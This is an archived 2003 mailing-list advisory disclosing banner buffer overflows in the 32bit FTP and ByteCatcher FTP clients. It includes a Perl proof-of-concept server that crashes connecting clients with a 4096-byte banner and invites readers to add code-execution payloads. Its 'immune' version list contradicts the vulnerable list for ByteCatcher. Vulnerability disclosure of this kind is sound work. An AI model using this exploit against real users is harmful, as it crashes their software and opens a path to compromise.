Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnwatch: Banner Buffer Overflows found in Multible FTP Clients

Banner Buffer Overflows found in Multible FTP Clients

From: <matrix_at_infowarfare.dk>
Date: Tue, 4 Feb 2003 10:32:03 +0100

                   Banner Buffer Overflows found in
                          Multible FTP Clients
                                       
                                                 
                        Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------

SUMMARY
A client side vulnerability in the product allows remote servers to cause the
client
to crash by sending it a large banner.

32bit FTP Client has currently been downloaded 19,330 times from
www.downloads.com
ByteCatcher FTP Client has currently been downloaded 169,912 times from
www.downloads.com

DETAILS

Vulnerable systems:
  * 32bit FTP Client version p9.49.01
     ByteCatcher FTP Client V1.04b
 
Immune systems:
 * 32bit FTP p9.50.01
    ByteCatcher FTP Client V1.04b

It's possible to crash theise FTP Clients by sending long (4096 bytes) FTP
banner to it.
The other more dangerous problem could be that this can be used to execute
arbitrary code,
on the users machine.
The following transcript demonstrates a sample exploitation of the
vulnerabilities, only to the point that we will kill the client, it is up to
you to put in
the evil evil code =)

#!/usr/bin/perl
######################################################
#
# Affected systems:
# 32bit FTP Client version p9.49.01
# ByteCatcher FTP Client V1.04b
# Possible many other clients, got this problem to
#
# http://www.infowarfare.dk
#
# Dennis Rand - Matrix_at_infowarfare.dk
#
# When FTP client connects to this server they will CRASH
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
#
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "4096";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse
=> 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
 print "Client connected.\n";
 print "Attacking...";
 print $client "$buf";
 print "OK\n";
 close($client);
}

Detection:
32bit FTP Client version p9.49.01 and ByteCatcher FTP Client V1.04b
is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:

Disclosure timeline:
04/01/2003 Found the Vulnerability.
04/01/2003 Author notified.
01/02/2003 Responses received
04/02/2003 Public Disclosure.

ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix_at_infowarfare.dk> Dennis Rand

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
Received on Feb 04 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos